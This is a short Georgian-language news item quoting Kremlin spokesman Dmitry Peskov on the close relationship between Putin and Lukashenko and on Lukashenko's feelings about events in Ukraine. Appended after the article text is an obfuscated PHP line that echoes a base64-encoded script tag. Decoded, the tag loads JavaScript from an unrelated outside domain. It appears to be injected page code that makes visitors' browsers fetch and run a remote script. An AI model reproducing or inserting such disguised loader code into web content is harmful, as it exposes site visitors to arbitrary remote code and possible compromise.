celsiusi
ავერსი საქკაბელი
კრემლის პრესსპიკერმა დიმიტრი პესკოვმა ტელეკომპანია Belarus-1-თან ინტერვიუში განაცხადა, რომ რუსეთისა და ბელარუსიის პრეზიდენტებს, შეუძლიათ თავიანთი ქვეყნების ინტერესების დაცვა ძალიან მკაცრად, მათ ესმით ერთმანეთის და აგრძელებენ მეგობრულ დიალოგს.
 
პესკოვის თქმით, ის რაც უკრაინაში ხდება, ვლადიმერ პუტინზე ნაკლებად არ სტკენს გულს ალექსანდრე ლუკაშენკოს.
 
„ალექსანდრე გრიგორევიჩი აბსოლუტურად უნიკალურ ურთიერთობაშია ჩვენს პრეზიდენტთან. მათ მართლაც უნიკალური ურთიერთობა აქვთ. მათ ისე ესმით იმის არსი, რაც ხდება ჩვენს ქვეყნებში და არსი იმისა, რაც ხდება ჩვენს ირგვლივ, როგორც სხვას არავის.
 
დარწმუნებული ვარ, რომ ის, რაც ახლა უკრაინაში ხდება, ალექსანდრე გრიგორევიჩს ვლადიმერ ვლადიმეროვიჩთან შედარებით გულს არანაკლებ სტკენს", - განაცხადა პესკოვმა.
745
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");